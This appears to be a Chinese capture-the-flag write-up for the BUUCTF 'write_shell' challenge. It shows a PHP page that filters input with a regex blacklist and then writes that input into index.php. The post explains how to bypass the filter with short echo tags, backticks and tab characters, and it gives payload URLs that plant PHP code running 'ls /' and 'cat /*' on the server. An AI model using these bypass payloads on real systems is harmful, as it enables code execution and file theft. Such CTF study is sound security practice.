buuctf-write_shell(命令执行)

本文探讨了一段PHP代码,该代码用于检查并过滤输入数据,以防止潜在的安全攻击。它包含一个waf函数,通过正则表达式过滤特定字符来阻止恶意输入。同时,代码还涉及文件上传功能,允许用户数据写入指定目录的index.php文件。然而,通过使用特殊字符如``和 ,可以绕过过滤机制,实现命令注入,例如列出目录内容或查看文件。这揭示了代码的安全漏洞及其可能的利用方式。
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

这道题可以传入两个值,action和data

?action=pwd

输出的是这个页面的储存路径 

 data中传的值会写入index.php中

但是data传的东西会被过滤

if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
        }
}

需要写入的数据:

<?php system('ls \')?>

php被过滤了改成<?= ?>标签

' 被过滤了可以用``代替

空格被过滤了用\t

?action=upload&data=<?=`ls\t/`?>

?action=upload&data=<?=`cat\t/flllllll1112222222lag`?>

 然后查地址就行了 

 或用*代替flllllll1112222222lag,直接查出当前目录下的所有文件

?action=upload&data=<?=`cat\t/*`?>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值